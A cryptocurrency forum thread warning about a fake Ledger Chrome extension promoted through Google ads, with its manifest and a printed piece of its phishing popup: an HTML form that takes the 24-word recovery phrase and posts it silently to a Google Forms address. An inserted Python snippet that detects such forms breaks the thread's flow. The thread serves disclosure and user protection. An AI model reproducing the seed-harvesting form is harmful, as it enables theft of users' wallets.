cryptomaniac_xxx (OP)
|
|
July 20, 2020, 03:16:27 PM |
|
1. Go to Google
2. Type "ledger live"
3. The first search returns an Ad, looks legit right?
4. But when you click on it, you will be redirected to ... wait for it.
5. A fake and malicious app on their Google Chrome store.
https://chrome.google.com/webstore/detail/nanoledger/oiekmlochkbifklpcbokmbbpihdneoln
Checking a bit further (curiosity kicks in), looking at the manifest.json, it seems to be writing to a google docs file here: https://clients2.google.com/service/update2/crx
Below is the complete code.
    {
      "browser_action": {
        "default_icon": { "256": "icons/icon-256.png" },
        "default_popup": "index.html",
        "default_title": "NanoLedger"
      },
      "description": "New NanoLedger, more secure, fast confirm transaction.",
      "icons": {
        "128": "icons/icon-128.png",
        "16": "icons/icon-16.png",
        "32": "icons/icon-32.png",
        "64": "icons/icon-64.png"
      },
      "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAgx54FjY2SgL8lJFz8BdKMXyOUbI2vCy20X15LMjcPPQpHLDLXWx1j2kVU3NuiL6mA80IbYfZWcs2I0/c0+st30ktRbSbGtoUVenJtWbBzMxHT2vnYe8SzjGwY6nCH467QrW6Yakfb2auHWmTDu380mV2Cx8lW47K9fnGS8d4t9suXSrjZFyo4prBEO5JK7w4xDiGHMXJw4iql3DmoQcBxZGSZiS8jhy54UOjB3Tr6u1vJITSCV2CPmr7+8sHpDCffjXJ6cIiJ6N5eD/nY3mSEuwuhy78NKnTuxsBUJTRlkf6nYWntVeEgfw7PE+rN0u+ZS8pTdQLRy7PNt//5gzp5wIDAQAB",
      "manifest_version": 2,
      "name": "NanoLedger",
      "update_url": "https://clients2.google.com/service/update2/crx",
      "version": "1.0"
    }
So please kindly help me report this malicious app...
|
|
|
|
AB de Royse777
Legendary
Offline
Activity: 2660
Merit: 4093
Campaign Manager. My Telegram @Royse777
|
|
July 20, 2020, 03:19:18 PM |
|
Not sure how fast it will work but you can try this: https://support.google.com/webmasters/answer/93713?hl=en
About how the ad went live? Don't expect the AI to work and verify like a human. In Google, when ads are created, an automated system reviews them before publishing. So, we see this kind of mistake very often.
|
|
|
|
stompix
Legendary
Offline
Activity: 3066
Merit: 6627
Leading Crypto Sports Betting & Casino Platform
|
|
July 20, 2020, 03:30:45 PM |
|
3. The first search returns an Ad, looks legit right? 4. But when you click on it, you will be redirected to ... wait for it.
Wait, did you get redirected when you clicked the ledger.com link or the ad? The ad that Google shows me is nothing even close to... legit. Without my Adblock my result page looks like this:
|
|
|
|
seoincorporation
Legendary
Offline
Activity: 3332
Merit: 3115
|
|
July 20, 2020, 03:40:58 PM |
|
Google's policy to review and verify apps before adding them to the store is terrible. They are good only at focusing on how much the client is paying for each click. We can call this an SEO attack.
|
|
|
|
AhmadM
|
|
July 20, 2020, 03:41:56 PM |
|
Yeah, I have the same result as well here. I guess he pointed to the wrong site; what he pointed to are the real ones, in my honest opinion. Already reported both the ads and the app, hope Google can take care of it as soon as possible.
|
|
|
|
TryNinja
Legendary
Offline
Activity: 3010
Merit: 7419
Top Crypto Casino
|
|
July 20, 2020, 04:14:45 PM |
|
Checking a bit further (curiosity kicks in), looking at the manifest.json, seems to be writing to a google docs file here: https://clients2.google.com/service/update2/crx Below is the complete code. So please kindly help me report this malicious apps...
That's not the code. It's just the extension manifest. The link you posted is Google's update service URL, which extensions use to auto-update in people's browsers. Here is the actual code (part of it):
    <form id="form" action="https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/formResponse" method="post" target="hidden_iframe" autocomplete="off">
       <iframe name="hidden_iframe" id="hidden_iframe" style="display:none;"></iframe>
       <div class="row">
          <input id="Field" name="entry.1148436374" placeholder="Please type your 24 words recovery phrase, with one space between each word." type="text" required>
       </div>
       <input type="hidden" name="entry.304429919" value="Ledger">
       </div>
       <div>
          <button id="send" type="submit" class="common_btn">Restore</button>
       </div>
    </form>
It asks for your 24 word seed and sends it through Google forms, all while copying Ledger Live's design.
We can report the form by clicking on "Report abuse" at the bottom and selecting Spam, malware or "phishing" (fake login). Also flooding them with fake data so they have less of a chance of scamming people. https://docs.google.com/forms/d/e/1FAIpQLSfUiPHs1lOr_XLMemq6aMLcS3BQ4BaYOJXDUTMEMqibPgazsA/viewform << SCAM!!!
|
|
|
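The pattern TryNinja describes above (a popup form that asks for the 24-word recovery phrase and posts it to a Google Forms endpoint through a hidden iframe) can be flagged statically when triaging an unpacked extension. This is an added example, not part of the original thread; the function names, the phrase heuristic and the constructed sample HTML with its placeholder form ID are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed heuristic: wording that asks the user for a wallet recovery secret.
SEED_PROMPT = re.compile(
    r"(recovery|seed|mnemonic)\s+(phrase|words?)|\b(12|24)\s+words?\b", re.I)

class FormAudit(HTMLParser):
    """Records every <form>, its seed-phrase prompts, and hidden iframes."""
    def __init__(self):
        super().__init__()
        self.forms, self.hidden_frames, self._form = [], set(), None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {"action": a.get("action", ""),
                          "target": a.get("target", ""), "prompts": []}
            self.forms.append(self._form)
        elif tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            if a.get("name") and "display:none" in style:
                self.hidden_frames.add(a["name"])
        elif tag in ("input", "textarea") and self._form is not None:
            label = a.get("placeholder", "")
            if SEED_PROMPT.search(label):
                self._form["prompts"].append(label)

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def audit_popup(html, allowed_hosts=()):
    """Return forms that ask for a recovery phrase and post it to another host."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        if form["prompts"] and host and host not in allowed_hosts:
            findings.append({"host": host, "prompts": form["prompts"],
                             "silent": form["target"] in parser.hidden_frames})
    return findings

# Constructed sample modelled on the popup quoted above; the form ID is a placeholder.
SAMPLE = """
<form action="/search" method="get"><input name="q" placeholder="Search"></form>
<form id="form" action="https://docs.google.com/forms/d/e/FORM_ID_PLACEHOLDER/formResponse"
      method="post" target="hidden_iframe" autocomplete="off">
  <iframe name="hidden_iframe" style="display:none;"></iframe>
  <input name="entry.0000000001" type="text" required
         placeholder="Please type your 24 words recovery phrase, with one space between each word.">
  <button type="submit">Restore</button>
</form>
"""
```

The "silent" flag marks forms whose target is a hidden iframe, which is why the victim never sees the Google Forms confirmation page after submitting.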
|
sujonali1819
Legendary
Offline
Activity: 2450
Merit: 1189
Need Campaign Manager?PM on telegram @sujonali1819
|
|
July 20, 2020, 04:30:41 PM |
|
Wait, did you get redirected when you click the ledger.com link or the ad,
I also have the same question. The screenshot that the OP provided redirected me to https://www.ledger.com/ledger-live. It seems legit. But the ad redirected to a new fake Chrome extension. And not only the word ''ledger'' live; I have searched ''Nano price'' and see the same ad by Google on the top. Just report these ads, and don't try to download anything except from official sources.
|
|
|
|
|
2chase
|
|
July 20, 2020, 04:36:07 PM |
|
|
|
|
|
SquirrelJulietGarden
|
|
July 20, 2020, 04:48:11 PM |
|
You will be safe if you don't forget basic rule. Don't believe in search results from Google or any search engines. You can use them but need to search with two or three engines and compare results.
Apps, don't search and download them on mobile. Visit sites that you bookmark, remember if search and double check, to get links to apps on stores. Using the search box in app stores to find apps is so stupid.
|
|
|
|
coupable
|
|
July 20, 2020, 05:53:56 PM |
|
You will be safe if you don't forget basic rule. Don't believe in search results from Google or any search engines. You can use them but need to search with two or three engines and compare results.
Apps, don't search and download them on mobile. Visit sites that you bookmark, remember if search and double check, to get links to apps on stores. Using the search box in app stores to find apps is so stupid.
That's right, and it should be treated with extreme caution when looking for important results. However, Google is still responsible for the kind of ads accepted in the first page results. I remember facing the same issue with the Epaiements company about two years ago, when the ad links redirected to a fake copy of the website and asked for login info. Managing ads shouldn't be fully automated imo. But who knows better than Google.
|
|
|
|
20kevin20
Legendary
Offline
Activity: 1134
Merit: 1598
|
|
July 20, 2020, 06:37:47 PM |
|
3. The first search returns an Ad, looks legit right?
That isn't an Ad. It's missing the "Ad" bolded term which should've been to the left side of the link and I think it's quite impossible for it to show up as "www.ledger.com" and redirect you to Chrome's web store... unless you intentionally posted a screenshot of the legit link or they found a critical vulnerability in Google's security to make it show up as the legit link.
Get an ad blocker and try to stop using Google. I hardly ever use it, and only when I really can't find the results I'm specifically looking for - they surely do have a better search AI, but otherwise I think I'm better without it.
|
|
|
|
ScamViruS
|
|
July 20, 2020, 06:53:32 PM |
|
I stopped believing in Google's ads long ago. They approve all kinds of ads to make money which is very dangerous for the users. I still don't know how google approves this type of ad. I have seen many scam websites running ads on google!
Depending on google, before downloading anything, you need to verify it yourself. Because if you are a victim of any kind of hacking, google will not take the responsibility, you have to take all the responsibility for your loss. So use ad blocker to stay safe in case of using google. Then google will not be able to promote such scams to you.
|
|
|
|
DdmrDdmr
Legendary
Offline
Activity: 2478
Merit: 11045
There are lies, damned lies and statistics. MTwain
|
|
July 20, 2020, 07:40:04 PM |
|
Beats me why anyone would go and spend some decent money on acquiring a Ledger device, and then fail to visit the original Ledger website to validate any related information they find on the internet, be it in an ad or not.
Likely, having the "Ad" beside the scam site gives the non-trained viewer an appearance of false security or trust in what they are seeing. Perhaps Google should step it up a bit, and besides providing astonishing business stats (Google's advertising revenue was over 116 billion USD last year it seems), discern a way to better avoid such from happening with a quasi-legitimate aura as is happening now (for example add a visual indicator for "trusted" advertisers - i.e. those that have a long history as corporations, mid-way advertisers, and novel advertisers + further controls on their behalf).
|
|
|
|
wxa7115
|
|
July 20, 2020, 07:45:34 PM |
|
I stopped believing in Google's ads long ago. They approve all kinds of ads to make money which is very dangerous for the users. I still don't know how google approves this type of ad. I have seen many scam websites running ads on google!
Depending on google, before downloading anything, you need to verify it yourself. Because if you are a victim of any kind of hacking, google will not take the responsibility, you have to take all the responsibility for your loss. So use ad blocker to stay safe in case of using google. Then google will not be able to promote such scams to you.
This is simple: they have so many clients that any kind of human audit is simply not possible or too costly for them to implement, so they are depending on automated solutions to try to filter possible scams. As we know, while this is cost-effective, too many scams and fraud attempts pass through those filters, damaging customers in the process. This is interesting: there was a time in which Google Ads were very effective, but due to the lack of care for their clients more and more people are beginning to see those ads as a bother, to the point they are blocking those ads as well with an ad blocker or they are preferring to use alternatives like duckduckgo.
|
|
|
|
JeromeTash
Legendary
Offline
Activity: 2324
Merit: 1258
Heisenberg
|
|
July 20, 2020, 10:05:38 PM |
|
1. Browser - Firefox
2. Search Engine - DuckDuck Go
3. Ad blocker - uBlock Origin
Leads to
People should avoid using the Google search engine and the Google Chrome browser.
|
|
|
|
LTU_btc
Legendary
Offline
Activity: 3234
Merit: 1374
Slava Ukraini!
|
|
July 20, 2020, 10:21:19 PM |
|
Nothing new, nothing surprising. I just want to ask, is it possible somehow to block these ads in search results using an ad blocker? I'm very careful with clicking links, but I'm still afraid that I can click such a link accidentally.
1. Browser - Firefox
2. Search Engine - DuckDuck Go
3. Ad blocker - uBlock Origin
Leads to https://i.imgur.com/OxBSnHm.png
People should avoid using the Google search engine and the Google Chrome browser.
Agree about Firefox and ad blocker. But it would be difficult to live without the Google search engine. Do you really use DuckDuckGo as your main search engine? I have tried it several times and I was disappointed. Search results were so bad compared to Google and it was too difficult to find what I was looking for. Don't even talk about languages other than English - with other languages it simply doesn't work and it's almost impossible to use this search engine.
|
|
|
|
mk4
Legendary
Offline
Activity: 2912
Merit: 3881
📟 t3rminal.xyz
|
|
July 21, 2020, 03:06:35 AM |
|
You will be safe if you don't forget basic rule. Don't believe in search results from Google or any search engines. You can use them but need to search with two or three engines and compare results.
I think that's over-complicating things a bit too much. Google's search results algorithm is freakin good in most cases unless you're searching for something way out of the ordinary, it's just that you need to ignore the ads being displayed. An easy solution is to simply just install an efficient browser adblock extension like uBlock Origin[1].
[1] https://github.com/gorhill/uBlock
|
|
|
|
anu1908
|
|
July 21, 2020, 05:16:56 AM |
|
i think this will keep happening in the next few years. it's probably hard to encode a scam/malware filter algorithm to an ai and train them, so they resort to the most cost-effective scenario, which is filter some basic words and wait for user report to delete the malicious ads. google have to level up their game.
|
|
|
|
OcTradism
|
|
July 21, 2020, 06:42:22 AM |
|
Apply my tutorial to safely visit website and download official apps. People don't know those safety steps or are lazy and careless. Days ago, terrible hacks on famous Twitter accounts are another reason to not believe in update news, wallet/app upgrade links on Twitter or any other platforms. I don't understand why people can believe in whatever is posted or tweeted by official accounts with official/legit marks. They believe by default without questions and verifications. Go to official apps, get links to download from sites and verify apps if possible. Even official websites can be compromised and unsafe. Monero website was compromised in the past several months. Officially visit websites & download apps, not fake ones.
|
|
|
|
Erumo
Member
Offline
Activity: 566
Merit: 50
|
|
July 21, 2020, 07:16:21 AM |
|
How can this crap sneak past Google security? Or is this a new wave of hack attack, like on Twitter and YouTube previously?
I've done everything that was in the first post and got redirected to the Ledger web page. After clicking download and choosing Google Play, got redirected to a store. The app logo looks different from how it is on the screenshot in the first post.
Using latest version of Chrome.
|
You mess with the meow meow You get the peow peow
|
|
|
|